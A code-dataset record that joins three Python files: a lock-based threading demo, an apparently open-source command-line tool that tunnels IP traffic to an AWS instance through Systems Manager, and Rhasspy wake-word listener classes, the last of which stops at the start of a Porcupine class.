| source | python |
|---|---|
mutual_exclusion.py
|
'''
The purpose of this snippet is to demonstrate protected mutual
exclusion, that is, using the acquire and release methods.
With these you can take and release the pencil (the lock).
'''
#!/usr/bin/env python3
""" Two shoppers adding items to a shared notepad """
import threading
import time
garlic_count = 0
pencil = threading.Lock()
def shopper():
global garlic_count
for i in range(5):
print(threading.current_thread().getName(), 'is thinking.')
time.sleep(0.5)
pencil.acquire()
garlic_count += 1
pencil.release()
if __name__ == '__main__':
barron = threading.Thread(target=shopper)
olivia = threading.Thread(target=shopper)
barron.start()
olivia.start()
barron.join()
olivia.join()
print('We should buy', garlic_count, 'garlic.')
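# A minimal equivalent sketch of the same critical section using the lock's
# context-manager form; `with pencil:` acquires on entry and releases on exit,
# even if the increment raises. Names (pencil, garlic_count) are the ones above.
#
#     def shopper():
#         global garlic_count
#         for i in range(5):
#             print(threading.current_thread().getName(), 'is thinking.')
#             time.sleep(0.5)
#             with pencil:
#                 garlic_count += 1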
|
ssm_tunnel_cli.py
|
#!/usr/bin/env python3
# Set up IP tunnel through SSM-enabled instance.
#
# See https://aws.nz/aws-utils/ssm-tunnel for more info.
#
# Author: Michael Ludvig (https://aws.nz)
import os
import sys
import time
import copy
import errno
import threading
import random
import struct
import select
import fcntl
import argparse
import ipaddress
from base64 import b64encode, b64decode
import pexpect
import botocore.exceptions
from .common import *
from .talker import SsmTalker
from .resolver import InstanceResolver
logger_name = "ssm-tunnel"
tunnel_cidr = "100.64.0.0/16"
keepalive_sec = 10
def parse_args():
"""
Parse command line arguments.
"""
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, add_help=False)
group_general = add_general_parameters(parser)
group_instance = parser.add_argument_group('Instance Selection')
group_instance.add_argument('INSTANCE', nargs='?', help='Instance ID, Name, Host name or IP address')
group_instance.add_argument('--list', '-l', dest='list', action="store_true", help='List instances registered in SSM.')
group_network = parser.add_argument_group('Networking Options')
group_network.add_argument('--route', '-r', metavar="ROUTE", dest="routes", type=str, action="append",
help='CIDR(s) to route through this tunnel. May be used multiple times.')
group_network.add_argument('--tunnel-cidr', metavar="CIDR", type=str, default=tunnel_cidr, help=f'''By default
the tunnel endpoint IPs are randomly assigned from the reserved {tunnel_cidr} block (RFC6598).
This should be ok for most users.''')
group_network.add_argument('--up-down', metavar="SCRIPT", dest='updown_script', type=str, help='''Script to call
during tunnel start up and close down. Check out 'ssm-tunnel-updown.dns-example' that
supports setting a custom DNS server when the tunnel goes up.''')
parser.description = 'Start IP tunnel to a given SSM instance'
parser.epilog = f'''
IMPORTANT: instances must be registered in AWS Systems Manager (SSM)
before you can establish a tunnel to them! Instances not registered in SSM
will not be recognised by {parser.prog} nor show up in --list output.
Visit https://aws.nz/aws-utils/ssm-tunnel for more info and usage examples.
Author: Michael Ludvig
'''
# Parse supplied arguments
args = parser.parse_args()
# If --version do it now and exit
if args.show_version:
show_version(args)
# Require exactly one of INSTANCE or --list
if bool(args.INSTANCE) + bool(args.list) != 1:
parser.error("Specify either INSTANCE or --list")
return args
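# Illustrative invocation only (hypothetical instance ID and CIDRs; the program
# name and exact flags come from the parser defined above):
#
#     ssm-tunnel i-0123456789abcdef0 --route 172.16.0.0/16 --route 10.0.0.0/8
#
# would resolve the instance, bring the tunnel up and route both CIDRs through it.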
class SsmTunnel(SsmTalker):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Stats structure
self.stats = { 'ts': 0, 'l2r': 0, 'r2l': 0 }
self.stats_lock = threading.Lock()
self.stats_secs = 10
self.stats_refresh = 0.5 # Print stats every this many seconds
self._exiting = False
self.tun_name = self._tun_fd = None
self.local_ip = self.remote_ip = self.routes = None
self.updown_script = self.updown_up_success = None
def run_command(self, command, assert_0=True):
self._logger.debug("command: %s", command)
ret = os.system(command)
if assert_0:
assert ret == 0
def open_remote_tunnel(self):
self._logger.debug('Creating tunnel')
# Open remote tun0 device
self._child.sendline(f"ssm-tunnel-agent {self.remote_ip} {self.local_ip}")
patterns = ['# Agent device .* is ready', 'command not found']
match = self._child.expect(patterns)
if match != 0: # Index matched in the 'patterns'
self._logger.error("Unable to establish the tunnel!")
self._logger.error("ssm-tunnel-agent: command not found on the target instance %s.", self._instance_id)
self._logger.error("Use 'ssm-session %s' and then run 'sudo pip install aws-ssm-tunnel-agent' to install it.", self._instance_id)
quit(1)
self._logger.debug(self._child.after)
def open_local_tunnel(self):
tun_suffix = ".".join(self.local_ip.split(".")[2:])
self.tun_name = f"tunSSM.{tun_suffix}"
self.create_tun()
self._tun_fd = self.open_tun()
self._logger.debug(f"# Local device {self.tun_name} is ready")
self._logger.info(f"Local IP: {self.local_ip} / Remote IP: {self.remote_ip}")
def create_tun(self):
try:
user_id = os.getuid()
self.run_command(f"sudo ip tuntap add {self.tun_name} mode tun user {user_id}")
self.run_command(f"sudo ip addr add {self.local_ip} peer {self.remote_ip} dev {self.tun_name}")
self.run_command(f"sudo ip link set {self.tun_name} up")
# Configure routes
for route in self.routes:
self.run_command(f"sudo ip route add {route} via {self.remote_ip}")
except AssertionError:
self.delete_tun()
quit(1)
except Exception as e:
self._logger.exception(e)
self.delete_tun()
raise
def delete_tun(self):
# We don't check return code here - best effort to close and delete the device
if self._tun_fd is not None:
try:
os.close(self._tun_fd)
self._tun_fd = None
except Exception as e:
self._logger.exception(e)
if self.tun_name is not None:
self.run_command(f"sudo ip link set {self.tun_name} down", assert_0=False)
self.run_command(f"sudo ip tuntap del {self.tun_name} mode tun", assert_0=False)
self.tun_name = None
def open_tun(self):
TUNSETIFF = 0x400454ca
IFF_TUN = 0x0001
tun_fd = os.open("/dev/net/tun", os.O_RDWR)
flags = IFF_TUN
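# The '16sH22s' layout below mirrors the kernel's struct ifreq as used by the
# TUNSETIFF ioctl: a 16-byte interface name, an unsigned short holding the
# flags, and 22 bytes of zero padding up to the expected structure size.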
ifr = struct.pack('16sH22s', self.tun_name.encode(), flags, b'\x00'*22)
fcntl.ioctl(tun_fd, TUNSETIFF, ifr)
return tun_fd
def local_to_remote(self):
last_ts = time.time()
while True:
if self._exiting:
break
try:
r, w, x = select.select([self._tun_fd], [], [], 1)
if not self._tun_fd in r:
if last_ts + keepalive_sec < time.time():
# Keepalive timeout - send '#'
self._child.sendline("#")
last_ts = time.time()
continue
buf = os.read(self._tun_fd, 1504) # Virtual GRE header adds 4 bytes
self._child.sendline("%{}".format(b64encode(buf).decode('ascii')))
except OSError as e:
if e.errno == errno.EBADF and self._exiting:
break
last_ts = time.time()
# Update stats
self.stats_lock.acquire()
self.stats['l2r'] += len(buf)
self.stats_lock.release()
self._logger.debug("local_to_remote() has exited.")
def remote_to_local(self):
while True:
if self._exiting:
break
try:
line = self._child.readline()
except pexpect.exceptions.TIMEOUT:
# This is a long timeout, 30 sec, not very useful
continue
if type(self._child.after) == pexpect.exceptions.EOF:
self._logger.warn("Received unexpected EOF - tunnel went down?")
self._exiting = True
break
if not line or line[0] != '%':
continue
buf = b64decode(line[1:].strip('\r\n'))
os.write(self._tun_fd, buf)
# Update stats
self.stats_lock.acquire()
self.stats['r2l'] += len(buf)
self.stats_lock.release()
self._logger.debug("remote_to_local() has exited.")
def process_traffic(self):
tr_l2r = threading.Thread(target=self.local_to_remote, args=[])
tr_l2r.daemon = True
tr_l2r.start()
tr_r2l = threading.Thread(target=self.remote_to_local, args=[])
tr_r2l.daemon = True
tr_r2l.start()
try:
self.display_stats()
except KeyboardInterrupt:
print("") # Just to avoid "^C" at the end of line
def run_updown(self, status):
if not self.updown_script:
return
if status == "down" and not self.updown_up_success:
# If 'up' failed we are immediately called with 'down' - don't do anything.
return
routes = " ".join(self.routes)
try:
cmd = f"{self.updown_script} {status} {self.tun_name} {self.local_ip} {self.remote_ip} {routes}"
self._logger.info(f"Running --up-down script: {cmd}")
self.run_command(cmd)
self.updown_up_success = True
except AssertionError:
self._logger.error(f'Updown script {self.updown_script} exited with error.')
sys.exit(1)
def start(self, local_ip, remote_ip, routes, updown_script):
self.local_ip = local_ip
self.remote_ip = remote_ip
self.routes = routes
self.updown_script = updown_script
try:
self.open_remote_tunnel()
self.open_local_tunnel()
self.run_updown("up")
self.process_traffic()
finally:
self._logger.info('Closing tunnel, please wait...')
self.run_updown("down")
self.exit()
self._exiting = True
self.delete_tun()
def display_stats(self):
def _erase_line():
print('\r\x1B[K', end="") # Erase line
stat_history = [self.stats]
stat_history_len = int(self.stats_secs / self.stats_refresh)
start_ts = time.time()
while True:
time.sleep(self.stats_refresh)
# Take another 'stat' snapshot
self.stats_lock.acquire()
stat_history.insert(1, copy.copy(self.stats))
self.stats_lock.release()
stat_history[1]['ts'] = time.time()
# Calculate sliding window average
if stat_history[1]['ts'] > stat_history[-1]['ts']:
l2r_avg = (stat_history[1]['l2r'] - stat_history[-1]['l2r'])/(stat_history[1]['ts'] - stat_history[-1]['ts'])
r2l_avg = (stat_history[1]['r2l'] - stat_history[-1]['r2l'])/(stat_history[1]['ts'] - stat_history[-1]['ts'])
else:
l2r_avg = r2l_avg = 0.0
# Trim the oldest points
del(stat_history[stat_history_len+1:])
uptime = seconds_to_human(time.time()-start_ts, decimal=0)
l2r_t_h, l2r_t_u = bytes_to_human(stat_history[1]['l2r'])
r2l_t_h, r2l_t_u = bytes_to_human(stat_history[1]['r2l'])
l2r_a_h, l2r_a_u = bytes_to_human(l2r_avg)
r2l_a_h, r2l_a_u = bytes_to_human(r2l_avg)
_erase_line()
print(f"{uptime} | In: {r2l_t_h:6.1f}{r2l_t_u:>2s} @ {r2l_a_h:6.1f}{r2l_a_u:>2s}/s | Out: {l2r_t_h:6.1f}{l2r_t_u:>2s} @ {l2r_a_h:6.1f}{l2r_a_u:>2s}/s", end="", flush=True)
def random_ips(network):
# Network address
net = ipaddress.ip_network(network)
# Random host-part
host_bytes = int(random.uniform(2, 2**(net.max_prefixlen-net.prefixlen)-4))&0xFFFFFFFE
# Construct local/remote IP
local_ip = net.network_address + host_bytes
remote_ip = net.network_address + host_bytes + 1
return local_ip.compressed, remote_ip.compressed
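# Illustrative only: random_ips("100.64.0.0/16") might return, for example,
# ("100.64.37.122", "100.64.37.123") - an adjacent local/remote pair whose
# local host part is forced even by the 0xFFFFFFFE mask above.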
def main():
if sys.platform != "linux":
print("The 'ssm-tunnel' program only works on Linux at the moment!", file=sys.stderr)
print("In other systems you are welcome to install it in VirtualBox or in a similar virtual environment running Linux.", file=sys.stderr)
quit(1)
## Split command line args
args = parse_args()
logger = configure_logging(logger_name, args.log_level)
tunnel = None
try:
if args.list:
# --list
InstanceResolver(args).print_list()
quit(0)
instance_id = InstanceResolver(args).resolve_instance(args.INSTANCE)
if not instance_id:
logger.warning("Could not resolve Instance ID for '%s'", args.INSTANCE)
logger.warning("Perhaps the '%s' is not registered in SSM?", args.INSTANCE)
quit(1)
local_ip, remote_ip = random_ips(args.tunnel_cidr)
tunnel = SsmTunnel(instance_id, profile=args.profile, region=args.region, logger_name=logger_name)
tunnel.start(local_ip, remote_ip, args.routes or [], args.updown_script)
except (botocore.exceptions.BotoCoreError,
botocore.exceptions.ClientError) as e:
logger.error(e)
quit(1)
finally:
if tunnel:
tunnel.delete_tun()
if __name__ == "__main__":
main()
|
wake.py
|
"""Wake word support."""
import json
import os
import re
import shutil
import struct
import subprocess
import threading
import time
from pathlib import Path
from typing import Any, Dict, Iterable, List, Optional, Type
from rhasspy.actor import RhasspyActor
from rhasspy.events import (
AudioData,
ListenForWakeWord,
MqttMessage,
MqttSubscribe,
PauseListeningForWakeWord,
ResumeListeningForWakeWord,
StartStreaming,
StopListeningForWakeWord,
StopStreaming,
WakeWordDetected,
WakeWordNotDetected,
)
from rhasspy.utils import read_dict
# -----------------------------------------------------------------------------
def get_wake_class(system: str) -> Type[RhasspyActor]:
"""Get type for profile wake system."""
assert system in [
"dummy",
"pocketsphinx",
"hermes",
"snowboy",
"precise",
"porcupine",
"command",
], f"Invalid wake system: {system}"
if system == "pocketsphinx":
# Use pocketsphinx locally
return PocketsphinxWakeListener
if system == "hermes":
# Use remote system via MQTT
return HermesWakeListener
if system == "snowboy":
# Use snowboy locally
return SnowboyWakeListener
if system == "precise":
# Use Mycroft Precise locally
return PreciseWakeListener
if system == "porcupine":
# Use Picovoice's porcupine locally
return PorcupineWakeListener
if system == "command":
# Use command-line listener
return CommandWakeListener
# Use dummy listener as a fallback
return DummyWakeListener
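# Illustrative mapping: get_wake_class("snowboy") returns SnowboyWakeListener,
# get_wake_class("dummy") returns DummyWakeListener, and any system name outside
# the list above fails the assert with "Invalid wake system: ...".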
# -----------------------------------------------------------------------------
class DummyWakeListener(RhasspyActor):
"""Does nothing"""
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
pass
# -----------------------------------------------------------------------------
# Pocketsphinx based wake word listener
# https://github.com/cmusphinx/pocketsphinx
# -----------------------------------------------------------------------------
class PocketsphinxWakeListener(RhasspyActor):
"""Listens for a wake word with pocketsphinx."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.receivers: List[RhasspyActor] = []
self.decoder = None
self.decoder_started: bool = False
self.preload = False
self.not_detected = False
self.chunk_size = 960
self.recorder: Optional[RhasspyActor] = None
self.threshold = 0.0
self.keyphrase = ""
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.preload = self.config.get("preload", False)
self.not_detected = self.config.get("not_detected", False)
self.chunk_size = self.profile.get("wake.pocketsphinx.chunk_size", 960)
if self.preload:
with self._lock:
try:
self.load_decoder()
except Exception:
self._logger.exception("loading wake decoder")
self.transition("loaded")
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForWakeWord):
self.load_decoder()
self.receivers.append(message.receiver or sender)
self.transition("listening")
if message.record:
self.send(self.recorder, StartStreaming(self.myAddress))
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, AudioData):
if not self.decoder_started:
assert self.decoder is not None
self.decoder.start_utt()
self.decoder_started = True
audio_data = message.data
chunk = audio_data[: self.chunk_size]
detected = False
while chunk:
result = self.process_data(chunk)
if result is not None:
detected = True
self._logger.debug("Hotword detected (%s)", self.keyphrase)
detected_msg = WakeWordDetected(
self.keyphrase, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, detected_msg)
break
audio_data = audio_data[self.chunk_size :]
chunk = audio_data[: self.chunk_size]
# End utterance
if detected and self.decoder_started:
assert self.decoder is not None
self.decoder.end_utt()
self.decoder_started = False
if not detected and self.not_detected:
# Report non-detection
not_detected_msg = WakeWordNotDetected(
self.keyphrase, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, not_detected_msg)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if not self.receivers:
# End utterance
if self.decoder_started:
assert self.decoder is not None
self.decoder.end_utt()
self.decoder_started = False
if message.record:
self.send(self.recorder, StopStreaming(self.myAddress))
self.transition("loaded")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
# -------------------------------------------------------------------------
def process_data(self, data: bytes) -> Optional[str]:
"""Process single chunk of audio."""
assert self.decoder is not None
self.decoder.process_raw(data, False, False)
hyp = self.decoder.hyp()
if hyp:
if self.decoder_started:
self.decoder.end_utt()
self.decoder_started = False
return hyp.hypstr
return None
# -------------------------------------------------------------------------
def load_decoder(self) -> None:
"""Loads speech decoder if not cached."""
if self.decoder is None:
import pocketsphinx
# Load decoder settings (use speech-to-text configuration as a fallback)
hmm_path = self.profile.read_path(
self.profile.get("wake.pocketsphinx.acoustic_model", None)
or self.profile.get("speech_to_text.pocketsphinx.acoustic_model")
)
dict_path = self.profile.read_path(
self.profile.get("wake.pocketsphinx.dictionary", None)
or self.profile.get("speech_to_text.pocketsphinx.dictionary")
)
self.threshold = float(
self.profile.get("wake.pocketsphinx.threshold", 1e-40)
)
self.keyphrase = self.profile.get("wake.pocketsphinx.keyphrase", "")
assert self.keyphrase, "No wake keyphrase"
# Verify that keyphrase words are in dictionary
keyphrase_words = re.split(r"\s+", self.keyphrase)
with open(dict_path, "r") as dict_file:
word_dict = read_dict(dict_file)
dict_upper = self.profile.get("speech_to_text.dictionary_upper", False)
for word in keyphrase_words:
if dict_upper:
word = word.upper()
else:
word = word.lower()
if word not in word_dict:
self._logger.warning("%s not in dictionary", word)
self._logger.debug(
"Loading wake decoder with hmm=%s, dict=%s", hmm_path, dict_path
)
decoder_config = pocketsphinx.Decoder.default_config()
decoder_config.set_string("-hmm", hmm_path)
decoder_config.set_string("-dict", dict_path)
decoder_config.set_string("-keyphrase", self.keyphrase)
decoder_config.set_string("-logfn", "/dev/null")
decoder_config.set_float("-kws_threshold", self.threshold)
mllr_path = self.profile.read_path(
self.profile.get("wake.pocketsphinx.mllr_matrix")
)
if os.path.exists(mllr_path):
self._logger.debug(
"Using tuned MLLR matrix for acoustic model: %s", mllr_path
)
decoder_config.set_string("-mllr", mllr_path)
self.decoder = pocketsphinx.Decoder(decoder_config)
self.decoder_started = False
# -----------------------------------------------------------------------------
# Snowboy wake listener
# https://snowboy.kitt.ai
# -----------------------------------------------------------------------------
class SnowboyWakeListener(RhasspyActor):
"""Listen for wake word with snowboy."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.receivers: List[RhasspyActor] = []
self.detectors: List[Any] = []
self.preload = False
self.not_detected = False
self.chunk_size = 960
self.recorder: Optional[RhasspyActor] = None
self.apply_frontend = False
self.models: Dict[str, Any] = {}
self.model_names: List[str] = []
self.single_detection: bool = True
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.preload = self.config.get("preload", False)
self.not_detected = self.config.get("not_detected", False)
self.chunk_size = self.profile.get("wake.snowboy.chunk_size", 960)
self.single_detection = self.profile.get("wake.snowboy.single_detection", True)
if self.preload:
try:
self.load_detectors()
except Exception as e:
self._logger.warning("preload: %s", e)
self.transition("loaded")
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForWakeWord):
try:
self.load_detectors()
self.receivers.append(message.receiver or sender)
self.transition("listening")
if message.record:
self.send(self.recorder, StartStreaming(self.myAddress))
except Exception:
self._logger.exception("in_loaded")
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, AudioData):
audio_data = message.data
chunk = audio_data[: self.chunk_size]
detected = []
while chunk:
for detector_index, result_index in enumerate(self.process_data(chunk)):
if result_index > 0:
detected.append(detector_index)
if detected:
# Don't process the rest of the audio data if hotword has
# already been detected.
break
audio_data = audio_data[self.chunk_size :]
chunk = audio_data[: self.chunk_size]
# Handle results
if detected:
# Detected
detected_names = [self.model_names[i] for i in detected]
self._logger.debug("Hotword(s) detected: %s", detected_names)
# Send events
for model_name in detected_names:
detected_event = WakeWordDetected(
model_name, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, detected_event)
if self.single_detection:
# Only allow for a single hotword to be detected
break
elif self.not_detected:
# Not detected
for model_name in self.model_names:
not_detected_event = WakeWordNotDetected(
model_name, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, not_detected_event)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if not self.receivers:
if message.record:
self.send(self.recorder, StopStreaming(self.myAddress))
self.transition("loaded")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
# -------------------------------------------------------------------------
def process_data(self, data: bytes) -> Iterable[int]:
"""Process single chunk of audio data."""
try:
for detector in self.detectors:
# Return is:
# -2 silence
# -1 error
# 0 voice
# n  hotword detected (model index n-1)
yield detector.RunDetection(data)
except Exception:
self._logger.exception("process_data")
# All silences
return [-2] * len(self.detectors)
# -------------------------------------------------------------------------
def load_detectors(self) -> None:
"""Load snowboy detector."""
if not self.detectors:
from snowboy import snowboydetect, snowboydecoder
# Load model names and settings
self.models = self._parse_models()
self.model_names = sorted(self.models)
# Create snowboy detectors
for model_name in self.model_names:
model_settings = self.models[model_name]
model_path = Path(self.profile.read_path(model_name))
assert model_path.is_file(), f"Missing {model_path}"
self._logger.debug("Loading snowboy model from %s", model_path)
detector = snowboydetect.SnowboyDetect(
snowboydecoder.RESOURCE_FILE.encode(), str(model_path).encode()
)
detector.SetSensitivity(str(model_settings["sensitivity"]).encode())
detector.SetAudioGain(float(model_settings["audio_gain"]))
detector.ApplyFrontend(bool(model_settings["apply_frontend"]))
self.detectors.append(detector)
self._logger.debug(
"Loaded snowboy model %s (%s)", model_name, model_settings
)
# -------------------------------------------------------------------------
def _parse_models(self) -> Dict[str, Dict[str, Any]]:
# Default sensitivity
sensitivity: str = str(self.profile.get("wake.snowboy.sensitivity", "0.5"))
# Default audio gain
audio_gain: float = float(self.profile.get("wake.snowboy.audio_gain", "1.0"))
# Default frontend
apply_frontend: bool = self.profile.get("wake.snowboy.apply_frontend", False)
model_names: List[str] = self.profile.get(
"wake.snowboy.model", "snowboy/snowboy.umdl"
).split(",")
model_settings: Dict[str, Dict[str, Any]] = self.profile.get(
"wake.snowboy.model_settings", {}
)
models_dict = {}
for model_name in model_names:
# Add default settings
settings = model_settings.get(model_name, {})
if "sensitivity" not in settings:
settings["sensitivity"] = sensitivity
if "audio_gain" not in settings:
settings["audio_gain"] = audio_gain
if "apply_frontend" not in settings:
settings["apply_frontend"] = apply_frontend
models_dict[model_name] = settings
return models_dict
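# With the default profile settings the result looks roughly like:
#   {"snowboy/snowboy.umdl": {"sensitivity": "0.5",
#                             "audio_gain": 1.0,
#                             "apply_frontend": False}}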
# -------------------------------------------------------------------------
def get_problems(self) -> Dict[str, Any]:
"""Get problems at startup."""
problems: Dict[str, Any] = {}
try:
# pylint: disable=W0611
from snowboy import snowboydetect, snowboydecoder # noqa: F401
except Exception:
problems[
"snowboy not installed"
] = "The snowboy Python library is not installed. Try pip3 install snowboy"
# Verify that all snowboy models exist
models = self._parse_models()
model_paths = [
Path(self.profile.read_path(model_name)) for model_name in models
]
for model_path in model_paths:
if not model_path.is_file():
problems[
"Missing model"
] = f"Snowboy model could not be loaded from {model_path}"
return problems
# -----------------------------------------------------------------------------
# Mycroft Precise wake listener
# https://github.com/MycroftAI/mycroft-precise
# -----------------------------------------------------------------------------
class PreciseWakeListener(RhasspyActor):
"""Listens for a wake word using Mycroft Precise."""
def __init__(self) -> None:
# pylint: disable=E0401
from precise_runner import ReadWriteStream
RhasspyActor.__init__(self)
self.audio_buffer: bytes = bytes()
self.audio_info: Dict[Any, Any] = {}
self.chunk_delay = 0
self.chunk_size = 2048
self.detected: bool = False
self.engine = None
self.engine_path = ""
self.model_name = ""
self.model_path = ""
self.prediction_sem = threading.Semaphore()
self.preload = False
self.receivers: List[RhasspyActor] = []
self.recorder: Optional[RhasspyActor] = None
self.runner = None
self.send_not_detected = False
self.stream: Optional[ReadWriteStream] = None
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.preload = self.config.get("preload", False)
self.send_not_detected = self.config.get("not_detected", False)
self.chunk_size = self.profile.get("wake.precise.chunk_size", 2048)
self.chunk_delay = self.profile.get("wake.precise.chunk_delay", 0)
if self.preload:
try:
self.load_runner()
except Exception:
pass
self.transition("loaded")
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForWakeWord):
try:
self.load_runner()
self.receivers.append(message.receiver or sender)
self.transition("listening")
if message.record:
self.send(self.recorder, StartStreaming(self.myAddress))
except Exception:
self._logger.exception("in_loaded")
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
try:
if isinstance(message, AudioData):
self.audio_info = message.info
self.detected = False
self.audio_buffer += message.data
num_chunks = len(self.audio_buffer) // self.chunk_size
if num_chunks > 0:
assert self.stream is not None
self.prediction_sem = threading.Semaphore()
for _ in range(num_chunks):
chunk = self.audio_buffer[: self.chunk_size]
self.stream.write(chunk)
self.audio_buffer = self.audio_buffer[self.chunk_size :]
if self.send_not_detected:
# Wait for all chunks to finish processing
for _ in range(num_chunks):
self.prediction_sem.acquire(timeout=0.1)
# Wait a little bit for the precise engine to finish processing
time.sleep(self.chunk_delay)
if not self.detected:
# Not detected
not_detected_event = WakeWordNotDetected(
self.model_name, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, not_detected_event)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if not self.receivers:
if message.record:
self.send(self.recorder, StopStreaming(self.myAddress))
self.transition("loaded")
elif isinstance(message, str):
# Detected
self._logger.debug("Hotword detected (%s)", self.model_name)
detected_event = WakeWordDetected(
self.model_name, audio_data_info=self.audio_info
)
for receiver in self.receivers:
self.send(receiver, detected_event)
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
except Exception:
self._logger.exception("in_listening")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
def to_stopped(self, from_state: str) -> None:
"""Transition to stopped state."""
self.stream = None
if self.runner is not None:
self.runner.stop()
# -------------------------------------------------------------------------
def load_runner(self) -> None:
"""Load precise runner."""
if self.engine is None:
# pylint: disable=E0401
from precise_runner import PreciseEngine
self.model_name = self.profile.get("wake.precise.model", "hey-mycroft-2.pb")
self.model_path = self.profile.read_path(self.model_name)
self.engine_path = os.path.expandvars(
self.profile.get("wake.precise.engine_path", "precise-engine")
)
self._logger.debug("Loading Precise engine at %s", self.engine_path)
self.engine = PreciseEngine(
self.engine_path, self.model_path, chunk_size=self.chunk_size
)
if self.runner is None:
# pylint: disable=E0401
from precise_runner import PreciseRunner, ReadWriteStream
self.stream = ReadWriteStream()
sensitivity = float(self.profile.get("wake.precise.sensitivity", 0.5))
trigger_level = int(self.profile.get("wake.precise.trigger_level", 3))
def on_prediction(prob: float) -> None:
self.prediction_sem.release()
def on_activation() -> None:
self.detected = True
self.send(self.myAddress, "activated")
self.runner = PreciseRunner(
self.engine,
stream=self.stream,
sensitivity=sensitivity,
trigger_level=trigger_level,
on_activation=on_activation,
on_prediction=on_prediction,
)
assert self.runner is not None
self.runner.start()
self._logger.debug(
"Loaded Mycroft Precise (model=%s, sensitivity=%s, trigger_level=%s)",
self.model_path,
sensitivity,
trigger_level,
)
# -------------------------------------------------------------------------
def get_problems(self) -> Dict[str, Any]:
"""Get problems at startup."""
problems: Dict[str, Any] = {}
try:
# pylint: disable=E0401,W0611
from precise_runner import PreciseRunner, ReadWriteStream # noqa: F401
except Exception:
problems[
"precise_runner not installed"
] = "The precise_runner Python library is not installed. Try pip3 install precise_runner"
engine_path = os.path.expandvars(
self.profile.get("wake.precise.engine_path", "precise-engine")
)
if not os.path.exists(engine_path) and not shutil.which(engine_path):
problems[
"Missing precise-engine"
] = 'The Mycroft Precise engine is not installed. Follow the <a href="https://github.com/MycroftAI/mycroft-precise#binary-install">binary install instructions</a>.'
model_name = self.profile.get("wake.precise.model", "hey-mycroft-2.pb")
model_path = self.profile.read_path(model_name)
if not os.path.exists(model_path):
problems[
"Missing model"
] = f"Your Mycroft Precise model could not be loaded from {model_path}"
return problems
# -----------------------------------------------------------------------------
# MQTT-based wake listener (Hermes protocol)
# https://docs.snips.ai/reference/hermes
# -----------------------------------------------------------------------------
class HermesWakeListener(RhasspyActor):
"""Listens for a wake word using MQTT."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.receivers: List[RhasspyActor] = []
self.site_ids = "default"
self.wakeword_id = "default"
self.wake_topic = ""
self.mqtt: Optional[RhasspyActor] = None
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.mqtt = self.config["mqtt"]
# Subscribe to wake topic
self.site_ids = self.profile.get("mqtt.site_id", "default").split(",")
self.wakeword_id = self.profile.get("wake.hermes.wakeword_id", "default")
self.wake_topic = f"hermes/hotword/{self.wakeword_id}/detected"
self.send(self.mqtt, MqttSubscribe(self.wake_topic))
self.transition("loaded")
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForWakeWord):
self.receivers.append(message.receiver or sender)
self.transition("listening")
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, MqttMessage):
if message.topic == self.wake_topic:
# Check site ID
payload = json.loads(message.payload.decode())
payload_site_id = payload.get("siteId", "")
if payload_site_id not in self.site_ids:
self._logger.debug(
"Got detected message, but wrong site id (%s)", payload_site_id
)
return
# Pass downstream to receivers
self._logger.debug("Hotword detected (%s)", self.wakeword_id)
result = WakeWordDetected(self.wakeword_id)
for receiver in self.receivers:
self.send(receiver, result)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if not self.receivers:
self.transition("loaded")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
# -----------------------------------------------------------------------------
# Porcupine Wake Listener
# https://github.com/Picovoice/Porcupine
# -----------------------------------------------------------------------------
class PorcupineWakeListener(RhasspyActor):
